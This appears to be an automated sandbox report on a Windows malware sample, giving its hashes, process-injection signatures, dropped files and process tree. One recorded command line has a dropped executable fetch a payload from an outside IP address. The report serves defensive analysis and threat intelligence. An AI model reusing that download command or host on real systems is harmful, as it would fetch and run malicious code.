Analysis
- max time kernel: 121s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 25-06-2024 14:07
Behavioral task: behavioral1
- Sample: 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
- Resource: win10v2004-20240611-en
General
- Target: 0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
- Size: 99KB
- MD5: 0e5c05933631c0c1f9c54bb1c48e5686
- SHA1: 074b9aa3537864c3481ed9ea6029653c64472df6
- SHA256: 8d437724ac136ad89b3dfa89cefe077e9016cec59e4c6475a93bee3a419ff8f8
- SHA512: 94e91ae8eabe55616bebd2647004af8c041edb50c405a05a7c28900f93bb80dbd057961da1fb17b05f6330515888d8c55ea1885743b58f938942dca8146eac8d
- SSDEEP: 1536:EJlwldZwdjTEo9cfWxfxHm9tYLiNqEWINp3+erhRhggt7FZ4BUbqdj:EJlwmjTsfWpRktYLiNqEWarNggBFGNx
Malware Config
Signatures
- Executes dropped EXE (1 IoCs)
  pid   Process
  2088  G1391-tmp.exe
- Loads dropped DLL (1 IoCs)
  pid   Process
  912   0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (8 IoCs)
  description                       pid  Process                                              procid_target
  PID 912 wrote to memory of 2088   912  0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe  28
  PID 912 wrote to memory of 2088   912  0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe  28
  PID 912 wrote to memory of 2088   912  0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe  28
  PID 912 wrote to memory of 2088   912  0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe  28
  PID 912 wrote to memory of 2992   912  0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe  30
  PID 912 wrote to memory of 2992   912  0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe  30
  PID 912 wrote to memory of 2992   912  0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe  30
  PID 912 wrote to memory of 2992   912  0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe  30
Processes
- Level 1: C:\Users\Admin\AppData\Local\Temp\0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\0e5c05933631c0c1f9c54bb1c48e5686_JaffaCakes118.exe"
  PID: 912
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  - Level 2: C:\Users\Admin\AppData\Local\Temp\G1391-tmp.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\G1391-tmp.exe http://202.83.212.246/drv32.data "C:\Users\Admin\AppData\Local\Temp\G13A2-tmp"
    PID: 2088
    - Executes dropped EXE
  - Level 2: C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c ""C:\tmp.bat" "
    PID: 2992
Network
MITRE ATT&CK Enterprise v15
Downloads
- Dropped file 1
  Filesize: 126KB
  MD5: 6deab4d5857cab2db48fee1d928159a3
  SHA1: 7b2d3295df966047325d19d4ecb49cc146a523dc
  SHA256: a15c5f871a8c2fea715d646f397e142fbb20df4484a3c34f81e8ce8f458cd5cc
  SHA512: b021dcc580fcbb5065dfaa76de31d59ff978694901d1a0e9ae678e9950793d22211de9175d032544eb6dafc42a3f9791058aa72c32edf033a92d65d6990fcf04
- Dropped file 2
  Filesize: 51B
  MD5: 7bf5edfd0ea421d8f898bf2375c77fb8
  SHA1: 95f45b04a6c811ee3e050adbca06f1c40546ca76
  SHA256: 2e8a5b2f9068c05e7529c4eb914c386c966b6b5684cd158f26082a99bff8af70
  SHA512: 6276d2d520b3cc2154ee9771cfd0452128cc5e4b041238daa6c78a77263f54045ab4f64158b9c3ba8025f328846191c7d3d0fc91b0a303c4956478b82cacff5d